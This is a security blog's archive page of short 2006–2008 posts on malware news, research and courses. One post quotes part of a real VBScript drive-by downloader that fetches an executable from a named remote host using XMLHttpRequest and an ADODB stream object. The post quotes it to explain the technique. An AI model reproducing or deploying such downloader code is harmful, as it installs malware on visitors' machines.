Of Spam & Men

To content | To menu | To search

Tag - malware

Entries feed - Comments feed

Monday 28 January 2008

Studying Malware Analysis In College

F-secure is about to start a course called "Malware Analysis and Antivirus Technologies" at the Helsinki University of Technology. I really wish we had that kind of classes when I was attending college!

And since F-secure is full of cool people, they provide the slides from the courses that were already done!

On the menu:

  • General introduction of the course [slides]
  • Fighting Online Crime [slides]
  • Windows operating system: Antivirus perspective.
  • Legal aspects of reverse engineering. Reverse engineering I
  • Reverse engineering II
  • Reverse engineering tools hands on classes
  • Mobile malware.
  • Using debuggers to analyze malware
  • Emulators and disassemblers. Behavioral analysis of malware.
  • Reverse engineering III
  • Unpacking and decrypting malware
  • Antivirus engine design.

from F-secure

Thursday 16 August 2007

Web Server Software and Malware

From Google Online Security Blog:

"In this post we investigate the distribution of web server software to provide insight into how server software is correlated to servers hosting malware binaries or engaging in drive-by-downloads."

Their numbers are slightly different from Netcraft's ones, but they give a fairly good explanation about it. According to Google IIS and Apache are sharing the same percentage in the overall malware distributing web servers.

Interesting facts: in the US Malwares are served at 80% by Apache, in China at 95% by IIS...

From Google Online Security Blog

Monday 23 July 2007

Chat^WTroll with malware authors

castlecops.gifCastelcops.com is a popular site aiming at providing informations assisting computer security education. Their forums are particularly useful when you think something fishy's going on. A lot of very well informed people are participating.

Recently a conversation about rogue domains used by the (nasty) zlob malware was posted and the malware author came and tried to explain that his little creation wasn't a malware and that they weren't doing anything bad. No need to tell you the discussion literally went kaboom.

via The SpywareGuide Greynets Blog

facetime: IM & P2P attacks on the rise

header_logo_186_r.gifFacetime Security Labs, an IM Security focused research lab, recently reported that IM & P2P attacks were on the rise: a 5% inscrease of incidents targeting public IM and P2P channels for Q2 2007 compared to Q1 2007. Just to compare, over the same period in 2006 a 35% decrease was seen.

The SpywareGuide Greynets Blog summarizes:

From Q1 to Q2 2007, attacks spread via the mainstream networks (Yahoo, MSN and AOL) dropped from 74 total incidents in the first period to 64 in the second quarter. Attacks spread via AOL dropped by more than half > (from 28 incidents to 13). Overall, the MSN network accounted for 50 percent of the attacks on the major networks, followed by Yahoo at 30 percent and AOL with 20 percent.

As we predicted earlier this year, attacks spread via Internet Relay Chat (IRC) continue to account for a growing percentage of all attacks. In fact, the percentage of attacks that are IRC-based has risen in each of the last six quarters, rising from a 59 percent share in Q1 2006 to 72 percent in the current quarter.

via The SpywareGuide Greynets Blog

Monday 7 May 2007

harvesting using adblock

drivebydownload1.png

Or The Amish Virus through Adwords

Didier Stevens conducted a little experiment: What if he used adword and told people to visit his blog to get infected by a malware? His ad was saying “Is your PC virus-free? Get it infected here!” and it ran for 6 months. Of course clicking on the link would not infect the visitor's computer, but still, it could have. Guess how many people clicked? 409.

409 people wanted their computer infected? well, i guess people dont read. How many person use google to surf, thinking that adwords are actually results given by google?

Monday 5 February 2007

Online System Security Scanners

Claus Valca posted a long list of online scanners:

  • Primarily virus/trojan related online scanners
  • Single-File Upload Scanners
  • Malware (spyware/adware/etc.) Online Scanners
  • Online "single-file" Multi-Scan Test Websites
  • Software or System Security Vulnerability Scanners
  • Not Quite "Fully-Online" Based Software or System Security Vulnerability Scanners

Continue reading...

Wednesday 3 January 2007

Research: IM Malware Attacks on the Rise

According to a new research report produced by security software maker Akonix Systems, in San Diego, experts at the company unearthed some 406 new IM-borne threats over the last 12 months, compared with 347 attacks tracked by the company in 2005.

In 2004 the company's security analysts discovered just under 50 attacks that were carried out either via IM or peer-to-peer technologies.

However, attacks delivered via P2P networks appear to be falling in popularity, as Akonix researchers recorded an 11 percent decrease in that type of threat during December 2006, with only 16 such attacks reported for the month. Akonix traditionally reports its research of IM and P2P threats simultaneously.

Continue reading...

Monday 4 December 2006

Bagle Returns

Several Antivirus and Security companies are reporting that Bagle's back on business.

Indeed F-Secure reports that some of the old Bagle update urls were activated on Nov. 30th.

Continue reading...

Friday 1 December 2006

Malware against virtual keyboards

malware-virtualkeyboard1.jpg

More and More banking institutions are replacing the usual username/password form with a virtual keyboard. The sole purpose of thie method is to defeat keyloggers.

Unfortunately for them, more and more malwares also defeat the purpose of using virtual keyboards. The guys at VirusTotal analyze a new trojan that performs a series of small screen captures of the area aroundthe mouse cursor.It also adds a red arrow pointing exactly where the user clicked.

Continue reading...

Thursday 23 November 2006

Malware 2.0: Malware utilizes AJAX to install itself


Well, ok, it's not really AJAX. This malware uses an HTML bit using XMLHttpRequest to fetch and download the actual executable. Add some minor obfuscation to fool antiviruses and you get W32/new-malware!Maximus on your harddrive:

[title][/title]
[head][/head]
[body]
[script language=”VBScript”]
on error resume next

‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”

‘ create adodbstream object
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")

Continue reading...

Saturday 18 November 2006

Malware Case Study

Secure Science Corporation and Michael Ligh did a very good job analyzing a malware. Their case study is a very complet and interesting analyze of a yet-to-be-named malware (prg.exe):

This document contains details of an exploratory case study that was conducted on a malware specimen found in the wild by members of the Mal-Aware Group 1 . The trojan was hosted on web servers located in the Ukraine and Russia, and existed among several gigabytes of data encoded with a proprietary algorithm. There were nearly 10,000 individual files available, each containing between 70 bytes and 56 megabytes worth of stolen data that only criminals could read…until now.

Continue reading...